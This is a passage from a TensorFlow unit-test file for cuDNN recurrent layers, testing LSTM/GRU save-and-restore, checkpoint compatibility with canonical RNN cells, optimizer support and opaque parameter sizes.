return inputs, initial_state
def ZeroState(self, batch_size):
num_layers = self._rnn.num_layers
dir_count = self._rnn.num_dirs
num_units = self._rnn.num_units
np_dtype = np.float32 if self._dtype == dtypes.float32 else np.float64
input_h = np.zeros((num_layers * dir_count, batch_size,
num_units)).astype(np_dtype)
if self._rnn.rnn_mode == CUDNN_LSTM:
input_c = np.zeros((num_layers * dir_count, batch_size,
num_units)).astype(np_dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
return initial_state
def FProp(self, inputs_t, initial_state_t, training):
"""Builds additional subgraph with given inputs and state.
Args:
inputs_t: a tensor.
initial_state_t: a tensor.
training: boolean, true if training mode.
Returns:
A tensor of the forward pass output of the model.
"""
outputs, output_state = self._rnn(
inputs_t, initial_state=initial_state_t, training=training)
return self._AddUp(outputs, output_state)
def Feed(self, sess, inputs, initial_state=None, return_sum=True):
"""Runs graph with given inputs and initial state."""
batch_size = inputs.shape[1]
if initial_state is None:
initial_state = self.ZeroState(batch_size)
if return_sum:
return sess.run(
self.total_sum,
feed_dict={self.inputs: inputs,
self.initial_state: initial_state})
else:
return sess.run(
[self.outputs, self.output_state],
feed_dict={self.inputs: inputs,
self.initial_state: initial_state})
def _CreateCudnnCompatibleCanonicalRNN(rnn, inputs, is_bidi=False, scope=None):
mode = rnn.rnn_mode
num_units = rnn.num_units
num_layers = rnn.num_layers
# To reuse cuDNN-trained models, must use cudnn compatible rnn cells.
if mode == CUDNN_LSTM:
single_cell = lambda: cudnn_rnn_ops.CudnnCompatibleLSTMCell(num_units)
elif mode == CUDNN_GRU:
single_cell = lambda: cudnn_rnn_ops.CudnnCompatibleGRUCell(num_units)
elif mode == CUDNN_RNN_TANH:
single_cell = (lambda: rnn_cell_impl.BasicRNNCell(num_units, math_ops.tanh))
elif mode == CUDNN_RNN_RELU:
single_cell = (
lambda: rnn_cell_impl.BasicRNNCell(num_units, gen_nn_ops.relu))
else:
raise ValueError("%s is not supported!" % mode)
if not is_bidi:
cell = rnn_cell_impl.MultiRNNCell(
[single_cell() for _ in range(num_layers)])
return rnn_lib.dynamic_rnn(
cell, inputs, dtype=dtypes.float32, time_major=True, scope=scope)
else:
cells_fw = [single_cell() for _ in range(num_layers)]
cells_bw = [single_cell() for _ in range(num_layers)]
(outputs, output_state_fw,
output_state_bw) = contrib_rnn_lib.stack_bidirectional_dynamic_rnn(
cells_fw,
cells_bw,
inputs,
dtype=dtypes.float32,
time_major=True,
scope=scope)
return outputs, (output_state_fw, output_state_bw)
class CudnnRNNTestBasic(test_util.TensorFlowTestCase):
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testLayerBasic(self):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
with vs.variable_scope("main"):
kernel_initializer = init_ops.constant_initializer(0.)
bias_initializer = init_ops.constant_initializer(0.)
inputs = random_ops.random_uniform([
num_layers * dir_count, batch_size, num_units], dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
# Build the layer
outputs1, _ = lstm(inputs)
# Reuse the layer
outputs2, _ = lstm(inputs)
total_sum1 = math_ops.reduce_sum(outputs1)
total_sum2 = math_ops.reduce_sum(outputs2)
with vs.variable_scope("main", reuse=True):
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
# Reuse the layer
outputs3, _ = lstm(inputs)
total_sum3 = math_ops.reduce_sum(outputs3)
self.assertEqual(1, len(variables.trainable_variables()))
self.assertEqual(1, len(ops.get_collection(ops.GraphKeys.SAVEABLE_OBJECTS)))
self.assertEqual("main/awesome_lstm/opaque_kernel",
variables.trainable_variables()[0].op.name)
with self.test_session(use_gpu=True) as sess:
sess.run(variables.global_variables_initializer())
(total_sum1_v, total_sum2_v, total_sum3_v) = sess.run(
[total_sum1, total_sum2, total_sum3])
self.assertEqual(0, total_sum1_v)
self.assertEqual(0, total_sum2_v)
self.assertEqual(0, total_sum3_v)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testOptimizersSupport(self):
for opt in ("adagrad", "adam", "rmsprop", "momentum", "sgd"):
self._TestOptimizerSupportHelper(opt)
def _GetOptimizer(self, opt):
if opt == "adagrad":
return adagrad.AdagradOptimizer(learning_rate=1e-2)
elif opt == "adam":
return adam.AdamOptimizer(learning_rate=1e-2)
elif opt == "rmsprop":
return rmsprop.RMSPropOptimizer(learning_rate=1e-2)
elif opt == "momentum":
return momentum.MomentumOptimizer(learning_rate=1e-2, momentum=0.9)
elif opt == "sgd":
return gradient_descent.GradientDescentOptimizer(learning_rate=1e-2)
else:
raise ValueError("Unsupported optimizer: %s" % opt)
def _TestOptimizerSupportHelper(self, opt):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
with ops.Graph().as_default() as g:
kernel_initializer = init_ops.constant_initializer(0.)
bias_initializer = init_ops.constant_initializer(0.)
inputs = random_ops.random_uniform([
num_layers * dir_count, batch_size, num_units], dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
outputs, _ = lstm(inputs)
loss = math_ops.reduce_sum(outputs)
optimizer = self._GetOptimizer(opt)
train_op = optimizer.minimize(loss)
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
sess.run(train_op)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveableGraphDeviceAssignment(self):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
def DeviceFn(op):
if op.type in ("Variable", "VariableV2"):
return "/cpu:0"
else:
return "/gpu:0"
with ops.Graph().as_default() as g:
with ops.device(DeviceFn):
with vs.variable_scope("main"):
kernel_initializer = init_ops.constant_initializer(3.14)
bias_initializer = init_ops.constant_initializer(1.59)
inputs = random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units],
dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
outputs = lstm(inputs)
# saver is created in the scope of DeviceFn.
saver = saver_lib.Saver()
with self.test_session(use_gpu=True, graph=g) as sess:
save_path = os.path.join(self.get_temp_dir(),
"test-saveable-device-assignment")
sess.run(variables.global_variables_initializer())
saver.save(sess, save_path)
saver.restore(sess, save_path)
sess.run(outputs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testDifferentShapesEager(self):
# Checks that kernel caching does not cause sharing of temporary storage
# across different input shapes when executing eagerly.
with context.eager_mode():
with ops.device("gpu:0"):
first_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 28]))
second_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 100]))
self.assertAllEqual([28, 100, 100], first_output.shape)
self.assertAllEqual([28, 100, 100], second_output.shape)
def _LossFunc():
first_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 28]))
second_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 100]))
return (math_ops.reduce_sum(first_output) +
math_ops.reduce_sum(second_output))
backprop.implicit_grad(_LossFunc)()
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testDifferentShapesGraph(self):
# Tests that a single kernel instance presented with multiple input shapes
# does not crash with graph execution.
with ops.device("gpu:0"):
layer = cudnn_rnn.CudnnGRU(1, 100)
layer(array_ops.zeros([28, 100, 100]))
def _Cond(index, accumulation):
del accumulation # unused
return math_ops.less(index, 4)
def _Body(index, accumulation):
layer_input = accumulation[:, :, 10 * (1 + index % 2):]
output, _ = layer(layer_input)
return index + 1, accumulation + output
original_input = array_ops.zeros([28, 100, 100])
_, accumulation = control_flow_ops.while_loop(_Cond, _Body,
[0, original_input])
grad, = gradients.gradients(
math_ops.reduce_sum(accumulation), (original_input,))
init_op = variables.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
accumulation_eval, grad_eval = sess.run((accumulation, grad))
self.assertAllEqual([28, 100, 100], accumulation_eval.shape)
self.assertAllEqual([28, 100, 100], grad_eval.shape)
# TODO(jamesqin): Transform to parameterized test after it is included in the
# TF open source codebase.
class CudnnRNNTestSaveRestore(test_util.TensorFlowTestCase):
def _CompareWeights(self, lhs, rhs):
self.assertEqual(len(lhs), len(rhs))
for lw, rw in zip(lhs, rhs):
self.assertAllEqual(lw, rw)
def _CompareBiases(self, lhs, rhs, rnn_mode, num_layers, direction):
self.assertEqual(len(lhs), len(rhs))
if rnn_mode == CUDNN_LSTM:
num_params_per_layer = CUDNN_LSTM_PARAMS_PER_LAYER
elif rnn_mode == CUDNN_GRU:
num_params_per_layer = CUDNN_GRU_PARAMS_PER_LAYER
elif rnn_mode == CUDNN_RNN_TANH:
num_params_per_layer = CUDNN_RNN_TANH_PARAMS_PER_LAYER
else:
num_params_per_layer = CUDNN_RNN_RELU_PARAMS_PER_LAYER
num_dirs = 1 if direction == CUDNN_RNN_UNIDIRECTION else 2
num_params_per_layer *= num_dirs
self.assertEqual(num_params_per_layer * num_layers, len(lhs))
for i in range(num_layers):
layer_lhs = lhs[i * num_params_per_layer: (i+1) * num_params_per_layer]
layer_rhs = rhs[i * num_params_per_layer: (i+1) * num_params_per_layer]
if direction == CUDNN_RNN_UNIDIRECTION:
self._CompareSingleLayerBiases(layer_lhs, layer_rhs)
else:
size = len(layer_lhs)
fw_lhs, bw_lhs = layer_lhs[:size//2], layer_lhs[size//2:]
fw_rhs, bw_rhs = layer_rhs[:size//2], layer_rhs[size//2:]
self._CompareSingleLayerBiases(fw_lhs, fw_rhs)
self._CompareSingleLayerBiases(bw_lhs, bw_rhs)
def _CompareSingleLayerBiases(self, lhs, rhs):
self.assertEqual(len(lhs), len(rhs))
lf_lhs, rt_lhs = lhs[:len(lhs)//2], lhs[len(lhs)//2:]
lf_rhs, rt_rhs = rhs[:len(rhs)//2], rhs[len(rhs)//2:]
self.assertEqual(len(lf_lhs), len(rt_lhs))
self.assertEqual(len(lf_rhs), len(rt_rhs))
sum_lhs, sum_rhs = [], []
for lf, rt in zip(lf_lhs, rt_lhs):
sum_lhs.append(lf + rt)
for lf, rt in zip(lf_rhs, rt_rhs):
sum_rhs.append(lf + rt)
self.assertEqual(len(sum_lhs), len(sum_rhs))
for lf, rt in zip(sum_lhs, sum_rhs):
self.assertAllEqual(lf, rt)
def _TestSaveRestoreVariable(self, rnn_mode, direction, dtype):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default() as g:
random_seed.set_random_seed(1234)
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
rnn = model.rnn
save_path = os.path.join(self.get_temp_dir(),
"save-restore-variable-test")
saver = saver_lib.Saver()
weights, biases = model.rnn.saveable._OpaqueParamsToCanonical()
opaque_params = rnn.trainable_variables[0]
# CudnnTestModel() creates CudnnOpaqueParamsSaveable that helps saver save
# Cudnn vars in canonical format.
reset_op = state_ops.assign(
opaque_params,
array_ops.zeros(array_ops.shape(opaque_params), dtype=dtype))
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
weights_v, biases_v = sess.run([weights, biases])
# Reset opaque param
sess.run(reset_op)
saver.restore(sess, save_path)
weights_v_restored, biases_v_restored = sess.run([weights, biases])
self._CompareWeights(weights_v, weights_v_restored)
self._CompareBiases(biases_v, biases_v_restored, rnn_mode, num_layers,
direction)
def _TestSaveRestoreTwoVariables(self, rnn_mode, direction, dtype):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default() as g:
random_seed.set_random_seed(1234)
with vs.variable_scope("m1"):
model1 = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
with vs.variable_scope("m2"):
model2 = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
opaque_params = (model1.rnn.trainable_variables[0],
model2.rnn.trainable_variables[0])
weights1, biases1 = model1.rnn.saveable._OpaqueParamsToCanonical()
weights2, biases2 = model2.rnn.saveable._OpaqueParamsToCanonical()
reset_params = [
state_ops.assign(params,
array_ops.zeros_like(params, dtype=dtype))
for params in opaque_params
]
reset_op = control_flow_ops.group(*reset_params)
save_path = os.path.join(self.get_temp_dir(),
"save-restore-variable-test2")
saver = saver_lib.Saver()
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
weights1_v, biases1_v = sess.run([weights1, biases1])
weights2_v, biases2_v = sess.run([weights2, biases2])
sess.run(reset_op)
saver.restore(sess, save_path)
weights1_v_restored, biases1_v_restored = sess.run([weights1, biases1])
weights2_v_restored, biases2_v_restored = sess.run([weights2, biases2])
self._CompareWeights(weights1_v, weights1_v_restored)
self._CompareWeights(weights2_v, weights2_v_restored)
self._CompareBiases(biases1_v, biases1_v_restored, rnn_mode, num_layers,
direction)
self._CompareBiases(biases2_v, biases2_v_restored, rnn_mode, num_layers,
direction)
def _TestSaveRestoreOutput(self, rnn_mode, direction, dtype):
with ops.Graph().as_default() as g:
num_layers = 2
num_units = 7
input_size = 7
seq_length = 8
batch_size = 4
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=False)
rnn = model.rnn
save_path = os.path.join(self.get_temp_dir(), "save-restore-output-test")
saver = saver_lib.Saver()
# Only one opaque var in a cudnn layer.
assert len(rnn.trainable_variables) == 1
reset_params = state_ops.assign(
rnn.trainable_variables[0],
array_ops.zeros(
array_ops.shape(rnn.trainable_variables[0]), dtype=dtype))
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
inputs, initial_state = model.SynthesizeInput(seq_length, batch_size)
total_sum_v = model.Feed(sess, inputs, initial_state)
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
sess.run(reset_params)
saver.restore(sess, save_path)
total_sum_v_restored = model.Feed(sess, inputs, initial_state)
self.assertAllClose(total_sum_v, total_sum_v_restored, atol=1e-5)
def _TestSaveRestoreHelper(self, rnn_mode):
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
dtype_list = [dtypes.float16, dtypes.float32, dtypes.float64]
for direction, dtype in itertools.product(directions, dtype_list):
self._TestSaveRestoreVariable(rnn_mode, direction, dtype)
self._TestSaveRestoreTwoVariables(rnn_mode, direction, dtype)
self._TestSaveRestoreOutput(rnn_mode, direction, dtype)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRepeatedlyCreateCustomSaveable(self):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default():
random_seed.set_random_seed(1234)
model = CudnnTestModel(
CUDNN_LSTM,
num_layers,
num_units,
input_size,
direction=CUDNN_RNN_UNIDIRECTION,
dtype=dtypes.float32)
with self.assertRaisesRegexp(RuntimeError,
"Cudnn saveable already created"):
model.rnn._create_saveable()
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreLSTM(self):
self._TestSaveRestoreHelper(CUDNN_LSTM)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreGRU(self):
self._TestSaveRestoreHelper(CUDNN_GRU)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRNNTanh(self):
self._TestSaveRestoreHelper(CUDNN_RNN_TANH)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRNNRelu(self):
self._TestSaveRestoreHelper(CUDNN_RNN_RELU)
class CudnnRNNTestSaveRestoreCheckpointable(test_util.TensorFlowTestCase):
def _VerifyCheckpoint(
self, checkpoint_path, compatible_cell_fn, cudnn_cell_fn,
num_layers, input_size, expected_variable_values, num_applications=3):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with ops.device("gpu:0"):
cudnn_layer = cudnn_cell_fn()
cudnn_checkpoint = checkpointable_utils.Checkpoint(cell=cudnn_layer)
status = cudnn_checkpoint.restore(checkpoint_path)
inputs = 3. * array_ops.ones([num_applications, num_layers, input_size],
dtype=dtypes.float32)
cudnn_output, _ = cudnn_layer(inputs)
status.run_restore_ops()
second_save_path = cudnn_checkpoint.save(checkpoint_prefix)
restore_layer = compatible_cell_fn()
restore_layer_checkpoint = checkpointable_utils.Checkpoint(
cell=restore_layer)
status = restore_layer_checkpoint.restore(second_save_path)
current_state = restore_layer.zero_state(1, dtypes.float32)
for _ in range(num_applications):
restore_layer_output, current_state = restore_layer(
inputs=3. * array_ops.ones([1, input_size]),
state=current_state)
status.run_restore_ops()
self.assertTrue(restore_layer.variables)
for variable, expected_value in zip(
restore_layer.variables, expected_variable_values):
self.assertAllClose(expected_value, self.evaluate(variable))
self.assertAllClose(self.evaluate(restore_layer_output),
self.evaluate(cudnn_output)[-1, -1:, ...])
def _CheckpointableSingleCellUnidirectionalTestTemplate(
self, single_cell_fn, cudnn_cell_fn):
# Single-layer cuDNN cells with object-based checkpointing should be
# checkpoint compatible with either single CudnnCompatible cells or
# MultiRnnCells with one cell.
input_size = 3
save_cell_layer = single_cell_fn()
save_cell_layer(
inputs=array_ops.ones([1, input_size]),
state=save_cell_layer.zero_state(1, dtypes.float32))
self.assertTrue(save_cell_layer.variables)
expected_values = []
np.random.seed(10)
for variable in save_cell_layer.variables:
value = np.random.normal(size=variable.shape)
expected_values.append(value)
self.evaluate(variable.assign(value))
save_checkpoint = checkpointable_utils.Checkpoint(cell=save_cell_layer)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
first_save_path = save_checkpoint.save(checkpoint_prefix)
self._VerifyCheckpoint(
checkpoint_path=first_save_path,
compatible_cell_fn=
lambda: rnn_cell_impl.MultiRNNCell([single_cell_fn()]),
cudnn_cell_fn=cudnn_cell_fn,
num_layers=1,
expected_variable_values=expected_values,
input_size=input_size)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testLSTMCheckpointableSingleLayer(self):
num_units = 2
direction = CUDNN_RNN_UNIDIRECTION
self._CheckpointableSingleCellUnidirectionalTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleLSTMCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnLSTM, num_layers=1, num_units=num_units,
direction=direction, name="awesome_lstm"))
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testGRUCheckpointableSingleLayer(self):
num_units = 2
direction = CUDNN_RNN_UNIDIRECTION
with self.assertRaises(NotImplementedError):
# TODO(allenl): Implement object-based saving for GRUs and other cells.
self._CheckpointableSingleCellUnidirectionalTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleGRUCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnGRU, num_layers=1, num_units=num_units,
direction=direction, name="awesome_gru"))
def _CheckpointableMultiLayerTestTemplate(
self, single_cell_fn, cudnn_cell_fn, num_layers):
def _MultiCellFn():
return rnn_cell_impl.MultiRNNCell(
[single_cell_fn() for _ in range(num_layers)])
input_size = 3
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(graph=save_graph):
save_layer = _MultiCellFn()
save_layer(inputs=array_ops.ones([1, input_size]),
state=save_layer.zero_state(1, dtypes.float32))
self.assertTrue(save_layer.variables)
expected_values = []
np.random.seed(10)
for variable in save_layer.variables:
value = np.random.normal(size=variable.shape)
expected_values.append(value)
self.evaluate(variable.assign(value))
save_checkpoint = checkpointable_utils.Checkpoint(cell=save_layer)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
first_save_path = save_checkpoint.save(checkpoint_prefix)
self._VerifyCheckpoint(
checkpoint_path=first_save_path,
compatible_cell_fn=_MultiCellFn, cudnn_cell_fn=cudnn_cell_fn,
num_layers=num_layers,
expected_variable_values=expected_values,
input_size=input_size)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testCudnnCompatibleLSTMCheckpointablMultiLayer(self):
num_units = 2
num_layers = 3
direction = CUDNN_RNN_UNIDIRECTION
self._CheckpointableMultiLayerTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleLSTMCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnLSTM, num_layers=num_layers, num_units=num_units,
direction=direction, name="awesome_lstm"),
num_layers=num_layers)
# TODO(jamesqin): Transform to parameterized test after it is included in the
# TF open source codebase.
class CudnnRNNTestCompatibleRNNCells(test_util.TensorFlowTestCase):
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleLSTM(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_LSTM)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleGRU(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_GRU)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleRNNTanh(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_RNN_TANH)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleRNNRelu(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_RNN_RELU)
def _TestCudnnCompatibleRnnCellsHelper(self, rnn_mode):
configs = [
{
"num_layers": 1,
"seq_length": 3,
"num_units": 4,
"input_size": 5,
"batch_size": 6,
},
{
"num_layers": 2,
"seq_length": 8,
"num_units": 4,
"input_size": 8,
"batch_size": 16,
},
{
"num_layers": 2,
"seq_length": 3,
"num_units": 4,
"input_size": 5,
"batch_size": 6,
},
{
"num_layers": 1,
"seq_length": 2,
"num_units": 2,
"input_size": 4,
"batch_size": 1,
},
]
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
for cfg, direction in zip(configs, directions):
self._TestCudnnCompatibleRnnCells(cfg["num_layers"], cfg["seq_length"],
cfg["num_units"], cfg["input_size"],
cfg["batch_size"], rnn_mode, direction)
def _TestCudnnCompatibleRnnCells(self, num_layers, seq_length, num_units,
input_size, batch_size, rnn_mode, direction):
dtype = dtypes.float32
# Train graph
with ops.Graph().as_default() as g:
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=True)
target_output = array_ops.placeholder(dtype=dtype)
loss_op = losses.log_loss(
labels=target_output, predictions=model.total_sum)
optimizer = gradient_descent.GradientDescentOptimizer(learning_rate=1e-2)
train_op = optimizer.minimize(loss_op)
saver = saver_lib.Saver()
# Train Cudnn model
seed = 0
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
# Train 128 steps
num_steps = 128
for _ in range(num_steps):
inputs, _ = model.SynthesizeInput(seq_length, batch_size, seed)
targets = np.random.rand()
sess.run(
train_op,
feed_dict={
model.inputs: inputs,
model.initial_state: model.ZeroState(batch_size),
target_output: targets
})
seed += 1
save_path = os.path.join(self.get_temp_dir(),
("cudnn-rnn-%s-test" % rnn_mode))
save_v = saver.save(sess, save_path)
self.assertEqual(save_path, save_v)
# Cudnn inference graph
with ops.Graph().as_default() as g:
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=False)
rnn = model.rnn
saver = saver_lib.Saver()
inference_input = np.random.rand(seq_length, batch_size,
input_size).astype(np.float32)
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
saver.restore(sess, save_path)
# Cudnn inference
cudnn_outputs_v, cudnn_output_states_v = model.Feed(
sess, inference_input, return_sum=False)
# Canonical RNN inference graph
with ops.Graph().as_default() as g:
cell_inputs = array_ops.placeholder(
dtype, shape=[seq_length, batch_size, input_size])
if direction == CUDNN_RNN_UNIDIRECTION:
# outputs is one tensor, states are num_layer tuples, each 2 tensors
(outputs, states) = _CreateCudnnCompatibleCanonicalRNN(rnn, cell_inputs)
if rnn_mode == CUDNN_LSTM:
output_h = array_ops.stack([s.h for s in states])
output_c = array_ops.stack([s.c for s in states])
else:
output_state = array_ops.stack([s for s in states])
else:
# outputs is one tensor.
# states is a tuple of 2 tuples:
# each sub tuple is num_layer tuples, each with 2 tensors.
(outputs, states) = _CreateCudnnCompatibleCanonicalRNN(
rnn, cell_inputs, is_bidi=True)
output_state_fw, output_state_bw = states
if rnn_mode == CUDNN_LSTM:
output_h, output_c = [], []
for s_fw, s_bw in zip(output_state_fw, output_state_bw):
output_h.append(array_ops.stack([s_fw.h, s_bw.h]))
output_c.append(array_ops.stack([s_fw.c, s_bw.c]))
output_h = array_ops.concat(output_h, axis=0)
output_c = array_ops.concat(output_c, axis=0)
else:
output_state = []
for s_fw, s_bw in zip(output_state_fw, output_state_bw):
output_state.append(array_ops.stack([s_fw, s_bw]))
output_state = array_ops.concat(output_state, axis=0)
saver = saver_lib.Saver()
with self.test_session(use_gpu=True, graph=g) as sess:
saver.restore(sess, save_path)
# BlockCell inference
if rnn_mode == CUDNN_LSTM:
outputs_v, output_h_v, output_c_v = sess.run(
[outputs, output_h, output_c],
feed_dict={cell_inputs: inference_input})
self.assertAllClose(cudnn_outputs_v, outputs_v)
cudnn_output_h_v, cudnn_output_c_v = cudnn_output_states_v
self.assertAllClose(cudnn_output_h_v, output_h_v)
self.assertAllClose(cudnn_output_c_v, output_c_v)
else:
outputs_v, output_state_v = sess.run(
[outputs, output_state],
feed_dict={cell_inputs: inference_input})
self.assertAllClose(cudnn_outputs_v, outputs_v, atol=2e-5, rtol=2e-5)
(cudnn_output_h_v,) = cudnn_output_states_v
self.assertAllClose(cudnn_output_h_v, output_state_v, atol=2e-5,
rtol=2e-5)
class CudnnRNNTestParamsSize(test_util.TensorFlowTestCase):
def _TestOpaqueParamsSize(self, rnn_mode, num_layers, num_units, input_size,
dtype, direction):
logging.info("Testing one lstm param size with config: %s", locals())
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
dtype=dtype,
direction=direction)
rnn = model.rnn
# Min param size estimate = sum(weights.size) + sum(biases.size)
min_params_size = (
np.sum(map(np.prod, rnn.canonical_weight_shapes)) +
np.sum([sp[0] for sp in rnn.canonical_bias_shapes]))
opaque_params = rnn.trainable_variables[0]
with self.test_session(use_gpu=True, graph=ops.get_default_graph()):
variables.global_variables_initializer().run()
opaque_params_size_v = opaque_params.eval().size
self.assertLessEqual(min_params_size, opaque_params_size_v)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testOpaqueParamsSize(self):
test_configs = [
[4, 200, 200],
[4, 200, 300],
[4, 200, 100],
[1, 100, 200],
[2, 200, 100],
[3, 200, 400],
]
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
dtype_list = [dtypes.float16, dtypes.float32, dtypes.float64]
rnns = [CUDNN_LSTM, CUDNN_GRU, CUDNN_RNN_RELU, CUDNN_RNN_TANH]
for (rnn, config, dtype, direction) in itertools.product(
rnns, test_configs, dtype_list, directions):
num_layers, num_units, input_size = config
with ops.Graph().as_default():
self._TestOpaqueParamsSize(rnn, num_layers, num_units, input_size,
dtype, direction)
class CudnnRNNTestTraining(test_util.TensorFlowTestCase):
def setUp(self):
super(CudnnRNNTestTraining, self).setUp()
self._reset_rnd_gen_state = os.environ.get("TF_CUDNN_RESET_RND_GEN_STATE",
str(False))
self._rnn_use_v2 = os.environ.get("TF_CUDNN_RNN_USE_V2", "0")
def tearDown(self):
super(CudnnRNNTestTraining, self).tearDown()
os.environ["TF_CUDNN_RESET_RND_GEN_STATE"] = self._reset_rnd_gen_state
os.environ["TF_CUDNN_RNN_USE_V2"] = self._rnn_use_v2
def _ComputeNumericGrad(self, sess, y, x, delta=1e-4, step=1):
"""Compute the numeric gradient of y wrt to x.
Args:
sess: The TF session constructed with a graph containing x and y.
y: A scalar TF Tensor in the graph constructed in sess.
x: A TF Tensor in the graph constructed in sess.
delta: Gradient checker's small perturbation of x[i].
step: Only compute numerical gradients for a subset of x values.
I.e. dy/dx[i] is computed if i % step == 0.
Returns:
A Tensor of the same shape and dtype as x. If x[i] is not chosen
to compute the numerical gradient dy/x[i], the corresponding
value is set to 0.
"""
x_data = sess.run(x)
x_size = x_data.size
x_shape = x_data.shape
numeric_grad = np.zeros(x_size, dtype=x_data.dtype)
for i in range(0, x_size, step):
x_pos = x_data.copy()
if x_size == 1:
x_pos += delta
else:
x_pos.flat[i] += delta
y_pos_feed_dict = dict([(x.name, x_pos)])
y_pos = sess.run(y, feed_dict=y_pos_feed_dict)
